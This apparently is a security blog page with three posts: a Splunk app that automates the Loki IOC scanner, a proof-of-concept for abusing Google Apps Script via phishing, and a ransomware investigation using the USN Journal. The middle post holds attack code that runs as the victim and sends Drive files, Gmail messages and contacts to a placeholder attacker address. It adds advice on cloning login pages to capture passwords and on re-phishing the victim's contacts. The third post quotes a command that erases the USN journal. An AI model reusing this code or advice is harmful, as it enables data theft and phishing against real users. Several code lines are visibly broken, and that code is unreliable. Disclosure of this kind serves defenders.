Sunday, April 16, 2017

Automating APT Scanning with Loki Scanner and Splunk

One thing that I've been exploring lately is automating the large number of amazing open source security tools out in the world. One tool that has caught my interest is the Loki APT scanner created by BSK Consulting, a cool scanner that combines filenames, IP addresses, domains, hashes, Yara rules, Regin file system checks, process anomaly checks, SWF decompressed scan, SAM dump checks, etc. to find indicators of compromise on your system. From the Loki github page, Loki currently includes the following IOC checks:
  • Equation Group Malware (Hashes, Yara Rules by Kaspersky and 10 custom rules generated by us)
  • Carbanak APT - Kaspersky Report (Hashes, Filename IOCs - no service detection and Yara rules)
  • Arid Viper APT - Trendmicro (Hashes)
  • Anthem APT Deep Panda Signatures (not officialy confirmed) ( - see Blog Post)
  • Regin Malware (GCHQ / NSA / FiveEyes) (incl. Legspin and Hopscotch)
  • Five Eyes QUERTY Malware (Regin Keylogger Module - see: Kaspesky Report)
  • Skeleton Key Malware (other state-sponsored Malware) - Source: Dell SecureWorks Counter Threat Unit(TM)
  • WoolenGoldfish - (SHA1 hashes, Yara rules) Trendmicro Report
  • OpCleaver (Iranian APT campaign) - Source: Cylance
  • More than 180 hack tool Yara rules - Source: APT Scanner THOR
  • More than 600 web shell Yara rules - Source: APT Scanner THOR
  • Numerous suspicious file name regex signatures - Source: APT Scanner THOR
  • Much more ... (cannot update the list as fast as I include new signatures)
The challenge with Loki is that it can be very laborious to run and parse Loki's scan results across an enterprise to find the needle in a haystack . In this post we'll show how to write a Splunk app to automate running Loki, parsing the results, and identifying what is important. But as an FYI, Loki is a CLI-based program that has the ability to scan a folder, your system, etc. for possible indicators of compromise. Basic Loki commands are:
usage: loki.exe [-h] [-p path] [-s kilobyte] [-l log-file] [-a alert-level]
                [-w warning-level] [-n notice-level] [--printAll]
                [--allreasons] [--noprocscan] [--nofilescan] [--noindicator]
                [--reginfs] [--dontwait] [--intense] [--csv] [--onlyrelevant]
                [--nolog] [--update] [--debug]    

Loki - Simple IOC Scanner    

optional arguments:
  -h, --help        show this help message and exit
  -p path           Path to scan
  -s kilobyte       Maximum file size to check in KB (default 2048 KB)
  -l log-file       Log file
  -a alert-level    Alert score
  -w warning-level  Warning score
  -n notice-level   Notice score
  --printAll        Print all files that are scanned
  --allreasons      Print all reasons that caused the score
  --noprocscan      Skip the process scan
  --nofilescan      Skip the file scan
  --noindicator     Do not show a progress indicator
  --reginfs         Do check for Regin virtual file system
  --dontwait        Do not wait on exit
  --intense         Intense scan mode (also scan unknown file types and all
  --csv             Write CSV log format to STDOUT (machine prcoessing)
  --onlyrelevant    Only print warnings or alerts
  --nolog           Don't write a local log file
  --update          Update the signatures from the "signature-base" sub
  --debug           Debug output
Before we begin with the steps to create the Splunk app, download the latest Loki Windows binary from here. For the sake of this blog post we will only be focusing on running Loki in Windows, but the functionality can easily be extended to all operating systems. Once downloaded, run the command "loki.exe --update" to download the latest IOC files into the folder "signature-base" that will be used later.

On a side note, if you would like to further update your IOCs to include Alienware malicious IPs and domains and MISP IOCs, use the signature update files located in "signature-base\threatintel". You will require an API key from Alienvault Open Threat Exchange (OTX), and a MISP API key from a running MISP instance. The AlienVault API key is easy to get, the MISP instance is a little more difficult. In any case, once you have your keys you can write a script that updates either or both services and schedule a Cron job with the following commands:
# Update AlienVault OTX:
  python -k <API_KEY>

# Update MISP:
  python -k <API_KEY> -u <URL>
Now that we have an updated Loki executable and signatures we are ready to create the Splunk App directory structure. In your Splunk Deployment Server create the following directories and files:
The following 
├── bin
|   ├── config\
|       ├── excludes.cfg
|   ├── signature-base\*
|   ├── loki.bat
|   └── loki.exe
├── default
|   ├── app.conf
|   ├── indexes.conf
|   ├── props.conf
|   ├── transforms.conf
|   └── inputs.conf
├── metadata
|   └── default.meta
Now that we have our directory structure, there are a couple of default files that will need to be created that we'll run through quickly:
1) $SPLUNK_HOME\etc\deployment_apps\Splunk_App_loki\bin\signature-base\*
# Copy the folder and its content created via the command "loki.exe --update"to the specified folder.
2) $SPLUNK_HOME\etc\deployment_apps\Splunk_App_loki\bin\config\excludes.cfg
This is actually a Loki default file, but should be included none the less.
# Excluded directories
# Ensure that you have the latest file from the excludes.cfg URL above.
# - add directories you want to exclude from the scan
# - double escape back slashes
# - values are case-insensitive
# - remember to use back slashes on Windows and slashes on Linux / Unix / OSX
# - each line contains a regex that matches somewhere in the full path (case insensitive)
#   e.g.:
#   Regex: \\System32\\
#   Matches C:\Windows\System32\cmd.exe
#   Regex: /var/log/[^/]+\.log
#   Matches: /var/log/test.log
#   Not Matches: /var/log/test.gz

# Useful examples (google "antivirus exclusion recommendations" to find more)
\\System Volume Information\\DFSR
The app.conf file maintains the state of a given app in Splunk Enterprise. It may also be used to customize certain aspects of an app.
## Splunk app configuration file

is_configured = true
state = enabled

author = epicism
version = 1.0
description = Technology Add-on for the Loki APT Scanner

is_visible = false
label = Technology Add-on for Loki APT Scanner

id = Splunk_App_loki
The default.meta file contain ownership information, access controls, and export settings for Splunk objects like saved searches, event types, and views. Each app has its own default.meta file.
access = read : [*], write: [ admin ]
export = system
Now that we have the default files out of the way we can create the Loki-specific configuration files. First is the inputs.conf file that runs the script that executes the loki.exe binary and reads the loki scan results.

The inputs.conf file contains possible settings you can use to configure inputs, distributed inputs such as forwarders, and file system monitoring in inputs.conf.
# This is where you would place your signature update script if you created it:
# [script://$SPLUNK_HOME\etc\apps\loki\bin\signature-base\threatintel\updateintel.bat]
# disabled = true
# index = main
# interval = 30 1 * * *
# sourcetype = lokirun

# This entry runs the loki batch script and sends the script output to a null index.
# I could not get loki.exe's output to be ingested by Splunk when running it from this script,
# so I routed loki.exe's output to the $SPLUNK_HOME\...\loki.log in the next stanza.
disabled = false
index = main
interval = 0 0 2 * * ?
sourcetype = lokirun
queueSize = 50MB

# The loki.bat batch script will save the loki.exe output to $SPLUNK_HOME\var\log\loki.log, and this reads it.
disabled = false
index = loki
sourcetype = loki
This script moves its current working directory to the location of the script, overwrites loki.log to ensure that it doesn't grow endlessly and runs loki.exe. "..\..\..\..\var\log\splunk\" saves the output log in Splunk's log directory.
cd /d %~dp0
> ..\..\..\..\var\log\splunk\loki.log echo.
start /low /d "%~dp0" loki.exe --reginfs --csv --dontwait --onlyrelevant --noindicator --intense -l ..\..\..\..\var\log\splunk\loki.log
The following files are the configuration files used by the Splunk Search Head to parse the Loki log files. The Loki log files are supposed to be CSV format, but only the first half of the values are, which required me to be creative when parsing the event logs. Props.conf will parse the first half of the properly CSV separated log, and transforms.conf parses the rest of the line.

A little on Props.conf - it is commonly used for:
  • Configuring line breaking for multi-line events;
  • Setting up character set encoding;
  • Allowing processing of binary files;
  • Configuring timestamp recognition;
  • Configuring event segmentation;
  • Overriding automated host and source type matching;
  • Configure advanced (regex-based) host and source type overrides;
  • Override source type matching for data from a particular source;
  • Set up rule-based source type recognition;
  • Rename source types;
  • And so on...
Props.conf is an integral part of a Splunk app, and I recommend that you read the props.conf description in the URL above if you're not familiar with it.

# This is for data that we don't want ingested to Splunk
LINE_BREAKER = ([\r\n]+)
disabled = 0
TRANSFORMS-null= setnull

#This entry parses the loki.exe "CSV" output
LINE_BREAKER = ([\r\n]+)
disabled = 0

# Example Log: 20170219T15:46:53Z,WIN-8J1HPPNE2HB,ALERT,FILE: C:\Users\x\Downloads\FlokiBot\64a23908ade4bbf2a7c4aa31be3cff24 SCORE: 100 TYPE: EXE SIZE: 400896 FIRST_BYTES: 4d5a90000300000004000000ffff0000b8000000 / MZ MD5: 64a23908ade4bbf2a7c4aa31be3cff24 SHA1: 2f87c2ce9ae1b741ac5477e9f8b786716b94afc5 SHA256: a4a810eebd2fae1d088ee62af725e39717ead68140c4c5104605465319203d5e CREATED: Tue Feb 07 13:45:11 2017 MODIFIED: Tue Feb 07 07:37:00 2017 ACCESSED: Tue Feb 07 13:45:11 2017REASON_1: Malware Hash TYPE: MD5 HASH: 64a23908ade4bbf2a7c4aa31be3cff24 SUBSCORE: 100 DESC: Flokibot Invades PoS: Trouble in Brazil
# EXTRACT-00-HEADER extracts the properly CSV values at the start of the log, and the REPORT-00-KEYVALUES transforms.conf entry parses the rest of the line.
EXTRACT-00-HEADER = ^(?<DATE>\d+)T(?<TIME>\d+:\d+:\d+)Z,(?<HOSTNAME>[^,]+),(?<SEVERITY>[^,]+),
# REPORT-00-KEYVALUES is responsible for parsing the remaining portion of the Loki event log not parsed by EXTRACT-00-HEADER. transforms.conf is good at parsing repeating values (such as "x=y" * z patterns), which is how Loki outputs its scan results.
REPORT-00-KEYVALUES = trans_keyvalues
A little on transforms.conf - it is commonly used for:
  • Configuring regex-based host and source type overrides;
  • Anonymizing certain types of sensitive incoming data, such as credit card or social security numbers;
  • Routing specific events to a particular index, when you have multiple indexes;
  • Creating new index-time field extractions. NOTE: We do not recommend adding to the set of fields that are extracted at index time unless it is absolutely necessary because there are negative performance implications;
  • And a lot more...
Like props.conf, transforms.conf is an integral configuration file to an app and I recommend that you read up on the URL to better understand the configuration file's function.

# This is supposed to remove Loki's process bar entries
REGEX = ^[\\\|\-\/\b]+$
DEST_KEY = queue
FORMAT = nullQueue

# This removes the loki.exe execution entry
REGEX = ^.*?\\etc\\apps\\loki\\bin>loki\.exe --reginfs --csv --dontwait --onlyrelevant --intense\s+$
DEST_KEY = queue
FORMAT = nullQueue

# "REGEX = XXX" parses the "key=value" pattern that isn't comma separated by performing a look ahead to detect the next "key=" entry. 
# FORMAT = $1::$2 tells Splunk that the key/value is to be formatted based on the first group that the regex extracts as the key, and the second group that the regex extracts as the value.
# Message me if you would like a deeper breakdown of how this works, and I would be happy to explain it.
REGEX = ([\w\d]+):\s(.*?)(?=((\s[\d\w]+:\s)|$))
FORMAT = $1::$2
And that's it! Simple, right? It may be overwhelming if you're new to Splunk apps, but the main thing that you should know is that inputs.conf runs loki.bat (that runs loki.exe) and monitors for the loki.log file to be updated with the scan results. props.conf parses the first half of the Loki event log, and transforms.conf parses the rest. Hopefully this is helpful, but if you need more information feel free to message me on twitter and I can provide more details.

Now we have a full app in your Splunk deployment server, re-deploy your deployment server apps using the command:
$SPLUNK_HOME/bin/splunk reload deploy-server
Now you should be able to see Splunk_App_loki in your Deployment server. Go to Settings -> Forwarder Management -> Apps, find Splunk_App_loki and click Edit.
Once in the App configuration section select the Reset Splunk checkbox and select Save.
Next go to the Server Class tab and create a new App by slicking New Server Class.
Name it Loki_App_Class (or whatever you want) and click OK. This will bring you to the Loki App Class screen:
Note, if you chose to create the Splunk_TA_loki app, you can perform the same steps as above and add your search head to the clients list, or using the cluster manager.

In the Apps section select of the page click Edit to take you to the App list page. Click on the Splunk_App_loki app in the left hand side list to add it to the app class and click Save:
This will take you back to the Loki_App_Class page. Next you will add the clients that you want to run the Loki APT scanner on. Click the Edit button on the Clients section of the page to take you to the list of clients (e.g. Splunk servers and Splunk Universal Forwarder servers). Add the Windows clients that you want to run Loki on on a regular schedule by adding their hostname to the Include (whitelist) textbox and click the Save button:

This will cause the clients in the Include (whitelist) of the  Loki_App_Class to download, install and run the Loki app the next time they call in to the deployment server every day at 2:00 AM, save the results to "$SPLUNK_HOME\var\log\splunk\loki.log" and then ingest and parse the results into Splunk, taking the following:
20170417T01:36:13Z,WIN-8J1HPPNE2HB,ALERT,FILE: C:\Program Files\SplunkUniversalForwarder\var\log\splunk\loki.log SCORE: 4630 TYPE: UNKNOWN SIZE: 281385 FIRST_BYTES: 32303137303431375430313a33333a33365a2c57 / 20170417T01:33:36Z,W MD5: 99bb9f6343fc69159a6e03e1ef8c6428 SHA1: 58bf43a5c0ec496e62f2217cfa789df35d1ea953 SHA256: 4e1feaa3b24529737fa5accda9beaa841fb259ed5474087aa1017f8427544c04 CREATED: Sun Apr 16 18:33:36 2017 MODIFIED: Sun Apr 16 18:34:46 2017 ACCESSED: Sun Apr 16 18:33:36 2017REASON_1: Yara Rule MATCH: GRIZZLY_STEPPE_Malware_2 SUBSCORE: 70 DESCRIPTION: Auto-generated rule - file 9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0 MATCHES: Str1: GoogleCrashReport.dll Str2: CrashErrors Str3: CrashSend Str4: CrashAddData Str5: CrashCleanup Str6: CrashInitREASON_2: Yara Rule MATCH: Casper_Included_Strings SUBSCORE: 50 DESCRIPTION: Casper French Espionage Malware - String Match in File - MATCHES: Str1: cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST Str2: & SYSTEMINFO) ELSE EXIT Str3: Str4: perfaudio.dat
20170417T01:38:59Z,WIN-8J1HPPNE2HB,WARNING,FILE: C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Cache\f_0000ab SCORE: 70 TYPE: RAR SIZE: 257998 FIRST_BYTES: 526172211a0700cf907300000d00000000000000 / Rar!s MD5: b7bec1fe35e86afc5b00f2b72f684406 SHA1: c875243df43d7a0baababf7488df884acffae2f9 SHA256: f1209bbd5163a03c4543607a1ce2c69548fa6bddc977670fad845fc42216c69f CREATED: Mon Feb 06 09:11:44 2017 MODIFIED: Mon Feb 06 09:11:44 2017 ACCESSED: Mon Feb 06 09:11:44 2017REASON_1: Yara Rule MATCH: Cloaked_RAR_File SUBSCORE: 70 DESCRIPTION: RAR file cloaked by a different extension
and turning it into parsed key/value pairs that can be used to run reports that show all Loki Scan results that have a 70% confidence level and above, or to fire an alert on confidence levels of 100% :
Loki Parsed Logs
This is great, but, really, so what? What can we do with this information? The value in this post is in creating the ability to automate a manual task across your your enterprise. You no longer have to manually run the Loki APT scanner on each system across your environment and parse through the results for possible issues. Automate, explore, expand, exploit, and exterminate (if I'm getting my references correct). With a sea of open source security tools that work well on a manual process, this solution can be an excellent method to provide a fresh insight into the workings, and malevolent workings, of an enterprise.

Monday, February 27, 2017

Abusing Google App Scripting Through Social Engineering

I recently joined a new company (hooray) and have had the opportunity thus far to start thinking more heavily about a few topics that are, I suppose, newer to me.

Most of this focus has been on Google Apps for Business, but generally speaking, we've been thinking about many different challenges that are posed by large enterprises adopting cloud solutions. Often these services lack; functionality required at the enterprise level (sometimes something basic such as logging of a particular event), inter-operability with other cloud services (leading to the rise of CASB tools), and a reactive API driven approach to security and monitoring. Although many CASB solutions offer API driven monitoring of a great variety of services, this is by it's nature a reactive or detective approach.

The recent Cloudflare edge server vulnerability disclosed by Tavis Ormandy is a great example of a type of risk posed by wide-spread adoption of the 'cloud'. This isn't to say that I think the cloud is inherently insecure, or that I'm arguing against it's adoption. Quite the contrary. The economic drivers supporting cloud adoption are difficult (at best) to argue against, and that alone is sufficient justification for the business to modify internal IT practice.

However, it is important to recognize that structural changes brought about by the widespread adoption of something 'new' and shiny, can often lead to blind spots in our understanding of how it can be abused.

If we think of hacking or information security attacks as goal driven endeavors that commonly have an end state of data theft, or data destruction, than we have to acknowledge that the means by which we accomplish these tasks can vary significantly. Typically, this would require exploiting some sort of web application vulnerability and reading tables from a back end database. In recent years, the PowerShell Empire tool has included a number of fantastic scripts that allow you to hunt across file shares for sensitive data. There are a variety of exfiltration methods available to an attacker.

So .....
You'd probably say stop it with the memes and get to the point Greg. Ok, fine.

With some clever social engineering, and abuse of Google App Scripts, you can accomplish exactly this. Please keep in mind, this post is focusing specifically on Google Apps for Business users or personal Gmail users.

What are Google App Scripts?
Google App Scripts is essentially a Javascript (although the file extension is designated '.GS') based cloud scripting language that allows you to automate tasks across the range of Google services. There are a number of feature-rich APIs for accessing Gmail, Drive, Calendar, Contacts, etcetera. 

For first time users, if you browse to you'll be presented with the web UI for developing GS scripts. The detailed API reference manual can be found here. There are several ways to utilize App Scripts. They can be embedded in a Google Sheet or a Google Doc. But what I am most interested in is the ability to 'Deploy as Web App'. Why? It specifically has to do with the permission set.
The permissions for a web app differ depending on whether you choose to execute the app as the owner of the script or as the active user who is accessing the web app.
If you choose for the script to execute as you, then the script will always execute under your identity, that is, the identity of the owner of the script. This will be the case regardless of which user is accessing the web app.
If you choose for the script to execute as the user who accesses the web app, then the script will execute under the identity of the active user who is accessing your script.
That last part (italicized), is the crucial element. After you have written your Google App Script, and you want to Deploy it, you can specify that the script executes as the user accessing the page like so:
Now, whenever a user visits this link they will be presented with a permissions acceptance dialog prompt that varies depending on the type of functionality we build into our Google App Script:

Followed By:
I view this as the equivalent of 'enable macros'. Sure, an educated and aware user may stop at these prompts and realize that something is amiss. However, for a lot of users, they aren't going to necessarily recognize anything bad here. This is a domain requesting permissions, the application itself is hosted and served by google. If the phishing lure is convincing enough, you can guarantee that many users will happily accept these warnings. Google does not provide any warning that the script could be from a third party or that it may in fact be malicious. The dialogue boxes do not 'feel' security related. Like many things in security, it comes down to user awareness.

So - what exactly can we do once the user clicks allow? I've written up a PoC to demonstrate some use-cases and I'll walk through these below. Do we get code execution? No. But again, if our goal is access to/destruction of data, does it matter how we achieve that, especially in a world where our perimter is porous and infrastructure design is increasingly cloud/service based? Moreover, use of this technique can be extremely powerful in extracting sensitive information from an organization that can be used for highly targeted follow up attacks that may increase the likelihood of successful exploitation. From a reconnaissance perspective, this takes Phishing to the next level (you aren't just getting, for example, User-Agent settings, now you can get actual internal data from the organization).
  • Create your application entry point. Since we are going to deploy this as a Web Application we need a doGet or doPost handler routine.
// Application Entry Point
// Application published to web requires doGet or doPost
function doGet(e) {
  var params = JSON.stringify(e);
  return HtmlService.createHtmlOutput('Index');
  • You can see we call the drivePassSearch function first. This will search through the victims Google Drive shares for file names matching a key word and steal them. This function creates a publicly available RWX folder in the users Drive account. You can apparently disable this for Google Apps for Business users although I believe everything is very 'open' by default. Not sure if personal users have any such capability. 
  • It searches for files on Drive that match our search criteria, records their name and location, makes a copy of the file in the public Drive share, and then emails a publicly accessible link to this share back to our attacker email address.
  • What are some use cases here? You can construct a search query for sensitive files housed on Drive. I've seen several organizations migrate entire file shares or Sharepoint deployment to Drive with all sorts of sensitive data. Look for PDFs, DOCX, XLSX files. You can search in the filename or inside the content of the document as well. It is also possible to use logical operators
    • 'fullText contains SOMETHING'
    • 'title contains SOMETHING'
    • 'and (mimeType contains 'image/' or mimeType contains 'video/')
  • Try searching for file name containing .cer, .pem, .der, .crt, .pub, id_rsa, .docx, .pdf, .vsd, .nessus, .dit, password, etc - Get Creative!
function drivePassSearch() {
  var folder = DriveApp.createFolder('Evil Folder');
  folder.setSharing(DriveApp.Access.ANYONE, DriveApp.Permission.EDIT);
  var files = DriveApp.searchFiles(
     'modifiedDate > "2013-02-28" and title contains "SEARCHTERM"');
 while (files.hasNext()) {
   var file =;
   var name = file.getName();
  • Now we take the data recorded by Logger and send it in an email back to our attacker email address. The message will come from the victim.
  var recipient = "ATTACKEREMAIL";
  var subject = 'Google Drive Query';
  var body = Logger.getLog();
  MailApp.sendEmail(recipient, subject, body);
  • If the organization has disabled publicly accessible Drive shares then you can use this workaround. Instead of uploading all files to this world-accessible Drive share, you can instead attach the file as a Blob to an email and send it to your attacker email address. 
  • This message will come from the victim user account. 
  • Warning: if your search term finds multiple files, it will send each one in a separate email. There are limits to how many emails a single account can send in a day.
  var file = DriveApp.getFilesByName('SEARCHTERM');
  var fileBlob =;
  if (file.hasNext()) {
    MailApp.sendEmail(recipient,'Google Drive search - Attached Files','Attached file matched a search term during Google Drive app script search.',{attachments: [fileBlob], name:})


  • Next - we want to steal emails
  • Similarly we construct a search against GmailApp. The search term specified in that function is the same format as Gmail searches you are used to doing (link).
  • This function will search through all mail, and if it finds a message matching the search criteria, it will forward it to our attacker email address.Use cases; forward all emails with an attachment, forward all emails with the word confidential, forward all emails that are starred, etc
function gmailKeySearch() {
  var threads ='subject:SEARCHTERM');
  for (var h = 0; h < threads.length; h++) {
    var messages = threads[h].getMessages();
    for (var i = 0; i < messages.length; i++) {
      if (messages[i].isStarred())
        var subject = messages[i].getSubject();
        var body = messages[i].getBody();
        var id = messages[i].getId();
          subject: subject,
          htmlBody: body,

  • Lastly, we mine the contacts database for information, composite a list of contacts, and send it back to our attacker email address.
  • Why? Attackers can use this to target additional individuals within the organization, construct bigger email spam lists, and just generally it's good to compile more information about your target.

function contactsRePhish() {
  var contacts = ContactsApp.getContacts();
  // Only pulling name and primary email, many other fields to extract from
  for (var i=0; i<contacts.length; i++) {   
    var name = contacts[i].getFullName();    
    var email = contacts[i].getPrimaryEmail();
    Logger.log("Name: "+name+" Email: "+email);

  var recipient = "ATTACKEREMAILADDRESS";
  var subject = 'Full List of Contacts';
  var body = Logger.getLog();
  MailApp.sendEmail(recipient, subject, body);

  • Keep in mind - with the example above we could have the victim user send an email from their account, to each of their contacts, asking them to click a link, or fill in information on a phishing website we have constructed. This is a great way to internally re-phish other users in an extremely convincing manner.
I'm sure people much smarter than myself could come up with other use cases. A few I haven't had time to explore; permanently delete all mail, permanently delete all Drive files, upload malicious files to drive, and create triggers to setup a recurring task.

Lastly, at the end of our doGet(e) application handling function, we return an object "HtmlService.createHtmlOutput('Index')". Index refers to an HTML file that we are passing to this object. The HTML file can be created in the script editor UI by going to File -> New -> HTML file. You can place whatever content in this HTML file to support your Phishing scenario (I'd suggest HTTrack to clone a web page from your target, perhaps a Citrix/RAS login page). You can have it look a BeEF JS hook, post form fields (such as passwords) out to listening web servers under your control, etc. The best part of the 'deploy as web app' option is that we can actually deploy a functional web application in addition to all of the core data search and exfiltration functionality.

This isn't the first I've heard of Google App Script 'abuse'. There are a number of malware researchers who have published articles about Carbanak abusing Google App Scripts to host C2 infrastructure. But I have yet to see or read about Google App scripting abuse in a social engineering context.

Edit: A friend sent me a link to a post from Andrew Cantino back in 2014, appears to be the first mention of this issue Kudos to Andrew for identifying this issue and raising it with Google. I think it needs more attention/discussion.

For full code sample go here:

Thanks, and feedback is welcome as per usual.

Monday, November 21, 2016

Ransomware IR with PowerForensics and the USN Journal

Well it's certainly been a while since I made a post!

I last blogged in February about Malware analysis and you can find that post here. My thanks go to Dave and Abdul for keeping content coming while I was slacking. It's hard to believe the year is almost over. It was a pretty busy one for me, I changed roles, changed companies, and moved across the country. I'll use that as my excuse for being too lazy to write anything :)

I also wanted to say thanks to everyone who has viewed this blog. In the last year or so, we've managed to accumulate over 100,000 views! Honestly, the sole intent of starting this site was to document our own study efforts but we've had good feedback and hope to share content more consistently in the new year. This field is changing rapidly, and the scope of knowledge is constantly expanding. Hopefully we can help you feel a little less overwhelmed!

For this post, I wanted to document an experience I had on a recent investigation and share some thoughts about how I tackled this challenge, to hopefully benefit your investigations. Specifically, we'll be looking at; Ransomware, live Incident Response using PowerForensics, and the USN Journal.

So let's dig in.

Our Scenario

Customer ABC requested assistance investigating a suspected case of Ransomware. An end user reported that file extensions had changed and they could no longer open documents. They also received a note demanding payment. The organization is curious to identify the source of the infection.

However there are two primary complications (both of which may be readily encountered in the real world). 
  1. The users browser history is gone (either wiped by malware or by the user themselves - they may have been browsing inappropriate content and are concerned about the IT staff identifying this).We aren't concerned about recovering this data, we want to look for an alternate method to investigate the infection.
  2. The company does not retain centralized logs, nor do they have an adequate local firewall log retention policy. There are no web browsing/firewall logs to obtain. This is of course, a finding in and of itself, but again, our focus here is working around these limitations

In a typical situation, carving browser history, and retrieving proxy/firewall logs would likely be sufficient in identifying malicious traffic but for this post we are assuming it is not available. It's important to have a variety of options when performing digital forensics and incident response. Conditions will often be less than ideal to it's important to find creative alternatives.

For this scenario we will primarily use a single tool to perform live Forensics on the compromised system, PowerForensics (from DFIR guru Jared Atkinson). This is an extremely powerful forensics framework composed of PowerShell (version 2 and higher) scripts that we can use to accomplish common DFIR tasks. Jared has an installation walk through but I found some of the subtle nuances of it weren't addressed in detail so I'd like to cover that here.

Note: Forensic best practices would advise you to take a complete, forensically sound, write-blocked image of the system, if possible, prior to executing any actions. You should always analyze an image and avoid working on a live system if it is confirmed as compromised. In this post we are performing live triage as it is being done in a 'lab' environment and for convenience sake. Depending on the situation, analyzing live systems may be entirely acceptable and preferred but this is completely circumstantial and is based on the complexity and potential legal outcomes of your investigation (and authorization of your superiors/client).

Tool Setup

On the infected machine:
  1. Download PowerForensics:
  2. Right-Click the ZIP file, check unblock, click apply. This is required to properly install this module.
  3. Open a PowerShell command prompt as administrator.
  4. Run the command 'Set-ExecutionPolicy Unrestricted'
    1. If you have issues here consult this blog post:
  5. Close and re-open the PowerShell prompt as administrator
  6. Make note of your PowerShell version using the following command:
    This is important as you will need to use PowerForensicsv2 depending on the installed version of PowerShell. For example, Windows Server 2008 has version 2 of PowerShell installed by default.
  7. Now you need to identify your User Module Path. Use the following command:
    This should print out a path to a series of PowerShell modules folder. There may be a series of paths but you can use one similar to: C:\Users\<username>\Documents\WindowsPowerShell\Modules
  8. The path identified above is where you need to unzip PowerForensics too. Remember, if your system is running PowerShell version2, unzip PowerForensicsV2 to that location.
    Note: It looks like the latest version bundles in v2 so you should be able to handle different versions in-line. You may not need to worry about unzipping the correct version.
  9. Now you can use the following commands to import PowerForensics and view the available functions it comes packaged with:
    Get-Module -ListAvailable -Name PowerForensics
    Import-Module PowerForensics
    Get-Command -Module PowerForensics


There are lots of fantastic modules that Jared has built, but in particular we'll be using the "Get-ForensicUsnJrnl" command. You can pass it a path using the VolumeName switch to retrieve USN artifacts for a specific volume. Use the Get-Help module to obtain usage syntax for each cmdlet (Get-Help Get-ForensicUsnJrnl).

Why are we concerned with this specific cmdlet? To answer that we need a bit of background.

NTFS is a Microsoft proprietary file system, that is to say it is responsible for keeping track of and managing files on disk. As computing requirements have grown more complex, file system standards have evolved to meet those needs and have expanded to include a variety of different features such as hard links, alternate data streams, and so on. 

The USN Journal is a feature of NTFS which maintains a record of changes made to a specified volume. Each volume maintains a USN Journal log. The USN Journal is a system metafile, and can not be viewed in a regular directory listing. On most systems it is enabled by default as Windows uses it for a number of core system operations (like file replication services). When NTFS objects are added, changed, or deleted, an entry is recorded in the USN Journal for a respective volume. This log does not contain enough information to 'reverse' a change, it is simply a record of activity that includes the type of change, the file object impacted.

Each USN entry is a data structure of the following format (Note: there are 3 different USN structure formats depending on the version of Windows you are running, the one described below is the oldest format, however they are all pretty similar):

typedef struct {
  DWORD         RecordLength;
  WORD          MajorVersion;
  WORD          MinorVersion;
  DWORDLONG     FileReferenceNumber;
  DWORDLONG     ParentFileReferenceNumber;
  USN           Usn;
  DWORD         Reason;
  DWORD         SourceInfo;
  DWORD         SecurityId;
  DWORD         FileAttributes;
  WORD          FileNameLength;
  WORD          FileNameOffset;
  WCHAR         FileName[1];

There are several important fields here, namely; FileName, Reason, Usn, TimeStamp, FileReferenceNumber.

The reason field in particular records a flag that corresponds with 20+ different possible NTFS operations such as:
These operations are fairly self-explanatory. 

The USN Journal is of value to our analysis because browser operations create temporary files when accessing pages. These temporary files record Journal entries. This means that even if we lose our firewall/proxy logs and browser history, there may still be a way to identify what actions occurred at the time frame in question.

Note: It is possible to, as with anything, tamper with forensic evidence and as such an attacker could theoretically purge the USN Journal using the following command: fsutil usn deletejournal /d c:
Similarly, CCleaner/PrivaZer/etc may also clear MFT/USN Journal records. Detecting the presence of those tools may be possible through alternative artificats such as AMCache or Prefetch files.


Keep one thing in mind - when you are dealing with the USN Journal you will be dealing with hundreds of thousands, if not millions of records. Determining what happened can be a time consuming effort so it is extremely important to narrow your focus down to a very small time frame (possibly an hour or two).

In our scenario, we are dealing with a a Ransomware infection, which typically leaves a ransom note on the desktop. We can perhaps use this to narrow our time frame.

Using PowerForensics we can pull out the MFT record for this file:
Master File Table Record Index: 24151
MFT Entry for Index 24151:
FullName             : C:\Users\greg\Desktop\!MADEUPFILENAME.html
Name                 : !MADEUPFILENAME.html
SequenceNumber       : 32
RecordNumber         : 24151
ParentSequenceNumber : 2
ParentRecordNumber   : 22060
Directory            : False
Deleted              : False
ModifiedTime         : 3/12/1601 1:17:27 PM
AccessedTime         : 3/12/1601 1:17:27 PM
ChangedTime          : 6/8/2016 1:27:40 AM
BornTime             : 3/12/1601 1:17:27 PM
FNModifiedTime       : 6/8/2016 1:27:40 AM
FNAccessedTime       : 6/8/2016 1:27:40 AM
FNChangedTime        : 6/8/2016 1:27:40 AM
FNBornTime           : 6/8/2016 1:27:40 AM

There are some discrepancies here between the FN and SI time stamps which may be due to stomping. However the $FN attributes accurately reflect an infection time of 6/8/2016 1:27:40 AM UTC. This is converted to 6/7/2016 6:27:40 PM EST which is roughly when the user asserts they noticed an issue.

But this might not be the first instance in which malware started executing, as the ransom note is usually dropped after file system encryption routine has been completed. We know that after each file is encrypted, the extension is changed to .crypz in our scenario. Consequently, we also can assert that the time of compromise would have to have happened just prior to the first file extension being renamed. We are essentially working backwards through the attack lifecycle.

  1. Ransom Note HTML file dropped
  2. Files encrypted, extension changed
  3. Malicious payload executed
  4. Malicious payload dropped
  5. Exploit kit successful exploitation
  6. Browser instantiates Flash/JS to execute vulnerability
  7. Web page redirect to malicious landing page

So, we can constrain our review of the USN Journal to the first instance of .crypz minus 30 minutes to be safe. It is also useful to grep on specific extensions such as .js, .zip, .exe, .dll, .swf, .htm, and others that may be involved in the attack lifecycle to further constrain your data set.

Using this technique I was able to identify the following sequence of events:
VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33080
FileSequenceNumber       : 28
ParentFileRecordNumber   : 206296
ParentFileSequenceNumber : 97
Usn                      : 4743722112
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : DATA_EXTEND, FILE_CREATE, CLOSE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : ARCHIVE, NCI
FileName                 : (REDACTEDWEBPAGE).jpg

VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33299
FileSequenceNumber       : 209
ParentFileRecordNumber   : 206165
ParentFileSequenceNumber : 763
Usn                      : 4743722424
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : FILE_CREATE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : ARCHIVE, NCI
FileName                 : dsF5h3S[1].htm

VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33707
